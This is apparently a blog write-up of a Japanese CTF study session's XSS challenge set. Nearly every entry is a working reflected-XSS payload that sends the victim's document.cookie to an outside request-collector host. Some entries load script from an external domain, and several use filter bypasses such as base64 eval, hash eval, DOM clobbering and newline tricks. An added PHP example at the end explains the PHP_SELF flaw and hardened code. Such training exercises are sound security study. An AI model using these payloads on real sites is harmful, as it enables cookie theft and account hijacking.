Sleepiness

Ramblings and notes

katagaitaiCTF study session: xss千本ノック (XSS rapid-fire drill) writeup

It was fun.

I'll try to solve them all... I want to, anyway...

2

Straightforward.

q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E

3

Straightforward.

q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E

4

Close the textarea.

q=</textarea><script>location.href='https://requestb.in/x0u1ovx0?f3='%20%2B%20document.cookie</script>

5

autofocus

q=%22%20 autofocus onfocus=%22location.href=%27https://requestb.in/x0u1ovx0?f5_=%27%20%2B%20document.cookie

6

Close with %27.

q=!%22%27%20 autofocus onfocus=location.href='https://requestb.in/x0u1ovx0?f6='%2Bdocument.cookie;//

7

autofocus

q=1%20autofocus%20onfocus=location.href=%27https://requestb.in/x0u1ovx0?f7=%27%2Bdocument.cookie;//

8

Set the iframe's src to javascript:

q=javascript:location.href=%22https://requestb.in/x0u1ovx0?f8=%22%20%2B%20document.cookie

9

script tag

q=%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f9=%22%20%2B%20document.cookie%3C/script%3E

10

"script" gets stripped, so write "script" many times over (nested).

q=%3Cscrscriptiscriptpscriptt%3Elocation.href=%22https://requestb.in/x0u1ovx0?f10=%22%20%2B%20document.cookie%3C/scrscriptiscriptpscriptt%3E

11,12

"script" gets stripped, so wedge it inside onload.

q=%3Csvg%20oscriptnload=location.href=%27https://requestb.in/x0u1ovx0?f11=%27%2Bdocument.cookie%20%27%20%3E

13

Close the alert().

q=%27);location.href=%22https://requestb.in/x0u1ovx0?%22%2Bdocument.cookie;//

14

Create an external script and load it.

q=%3Cscript%20src=http://aviavi.ga/ajs%3E%3C/script%3E

15

Create an external script with an uppercase name and load it. The HTTP://domain part connects regardless of case.

q=%3Cscript%20src=http://aviavi.ga/AJS%3E%3C/script%3E

16

"." can't be used, so eval base64.

q=%3Cscript%3Eeval(atob('bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iICsgZG9jdW1lbnQuY29va2ll'))%3C/script%3E

17

' can't be used, so use backticks.

q=%3Cscript%3Eeval(atob(`bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iICsgZG9jdW1lbnQuY29va2ll`))%3C/script%3E

18,19

Use base64 in the script tag.

q=%3C/script%3E%3Cscript%20src=%27data:text/html;base64,bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iK2RvY3VtZW50LmNvb2tpZQ==%27%3E%3C/script%3E

20

eval the hash from a script tag.

q=%3Csvg%20onload=eval(URL.slice(105))%3E#location["href"]="https://requestb.in/x0u1ovx0?f3="+document.cookie

21

eval the hash with svg onload. "." can't be used, so use location["href"].

q=%22%3E%3Cimg%3E//onload=eval(URL.slice(127));%20//a%20//src=/#location["href"]="https://requestb.in/x0u1ovx0?f3="+document.cookie

22,23

eval the hash.

q=%3Csvg%20//%20onload=eval(URL.slice(112))%3E//#location.href="https://requestb.in/x0u1ovx0?f3="+document.cookie

24

document is null, so use window.

q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Bwindow.document.cookie

25~28

window is null too, so use this or top.

q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Bthis.document.cookie

q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Btop.document.cookie

29

Have it load an img tag without closing it.

q=aa%3C/p%3E%3Cp%3E%3Cimg%20%3Cimg%20%20%20src=%22https://requestb.in/x0u1ovx0?

30

Quotes and "." can't be used, so grind it out by concatenating the hash string character by character.

q=location[`href`]=location[`hash`][1]%2Blocation[`hash`][2]%2Blocation[`hash`][3]%2Blocation[`hash`][4]%2Blocation[`hash`][5]%2Blocation[`hash`][6]%2Blocation[`hash`][7]%2Blocation[`hash`][8]%2Blocation[`hash`][9]%2Blocation[`hash`][10]%2Blocation[`hash`][11]%2Blocation[`hash`][12]%2Blocation[`hash`][13]%2Blocation[`hash`][14]%2Blocation[`hash`][15]%2Blocation[`hash`][16]%2Blocation[`hash`][17]%2Blocation[`hash`][18]%2Blocation[`hash`][19]%2Blocation[`hash`][20]%2Blocation[`hash`][21]%2Blocation[`hash`][22]%2Blocation[`hash`][23]%2Blocation[`hash`][24]%2Blocation[`hash`][25]%2Blocation[`hash`][26]%2Blocation[`hash`][27]%2Blocation[`hash`][28]%2B`?`%2Bdocument[`cookie`]#https://requestb.in/x0u1ovx0

31

Close the document.write().

q=%27);location.href=%27https://requestb.in/x0u1ovx0?%27%2Bdocument.cookie;//

32

Use an escape in the first parameter so the string can't be closed.

q1=\&q2=,location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie//

33

Create a blink tag with blink() and put an svg inside it.

q=%22%3Csvg%20onload=location.href=%27https://requestb.in/x0u1ovx0?%27%2Bdocument.cookie;%3E%22.blink()

34

Override type so it is no longer hidden.

q=%22%20onfocus=location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie%20type=text%20autofocus%20a

35

Newline code %0a

q=%0Alocation.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

36

Newline codes %0A%0D

q=%0A%0Dlocation.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

37

Newline codes %0A%0D%E2%80%A8

q=%0A%0D%E2%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

38

Newline codes %0A%0D%E2%80%A8%E2%E2%80%A8%80%A8

q=%0A%0D%E2%80%A8%E2%E2%80%A8%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

39

%E2%80%A8 gets removed, so stuff in a lot of them.

q=%0A%0D%E2%80%A8%E2%E2%80%A8%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie

40

Bypass the XSS auditor with backticks.

q1=%3Cscript%3E`&q2=a`;location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie;%3C/script%3E`

41

eval the hash.

q=%3Cscript%3Eeval(eval(location.href.substr(-92)))%3C/script#atob("bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9gK2RvY3VtZW50LmNvb2tpZTs=")

42,43

eval base64.

q=%3Csvg%20onload=eval(atob(`bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9gK2RvY3VtZW50LmNvb2tpZTs=`))%3E

44

Everything was escaped, so I thought "this is impossible".

& => &amp;
' => &#039;
" => &quot;
> => &gt;
< => &lt;
!$%[@:][{}*`+}()~=`$

It was a PHP problem.

The form's URL uses $_SERVER['PHP_SELF'].

Combine that with DOM clobbering to overwrite document.body.

~~.knock.xss.moe//index.php/%22%20name=body%20%3E%3Cinput%20value=%22?q=%3Csvg%20onload=eval(atob(`bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi9waHdxNWRwaD9gK2RvY3VtZW50LmNvb2tpZTs=`))%3E
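As an added illustration of the PHP_SELF issue behind challenge 44 (not code from the writeup or the challenge site), the weak form pattern beside a hardened one; the request path and the helper names are constructed for this example.

```php
<?php
// Added example, not the challenge's own code. $_SERVER['PHP_SELF'] echoes
// the path the browser sent, including any PATH_INFO after index.php, so
// printing it raw into an attribute lets request-controlled text land
// inside the form tag even when the "q" parameter itself is escaped.

// Weak: raw PHP_SELF inside an attribute (the pattern described above).
function weak_form_action(): string {
    return '<form action="' . $_SERVER['PHP_SELF'] . '" method="get">';
}

// Hardened: do not reflect the request path at all. An empty action
// submits to the current URL; a fixed path works just as well.
function hardened_form_action(): string {
    return '<form action="" method="get">';
}

// If PHP_SELF really must be printed, escape it with ENT_QUOTES so both
// quote styles stay inside the attribute.
function escaped_form_action(): string {
    $self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $self . '" method="get">';
}

// DOM clobbering side: forms, images and iframes with a name attribute
// become properties of document and can shadow built-ins such as
// document.body. Keep name attributes fixed and away from user input;
// only the value is user data, and it is escaped.
function search_input(string $q): string {
    $safe = htmlspecialchars($q, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="q" value="' . $safe . '">';
}

// Constructed request path for a local check (assumption).
$_SERVER['PHP_SELF'] = '/index.php/" x="y';
echo weak_form_action(), "\n";     // the quote breaks out of the attribute
echo escaped_form_action(), "\n";  // &quot; stays inside the attribute
echo hardened_form_action(), "\n";
echo search_input('"><svg>'), "\n";
```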

45

No good.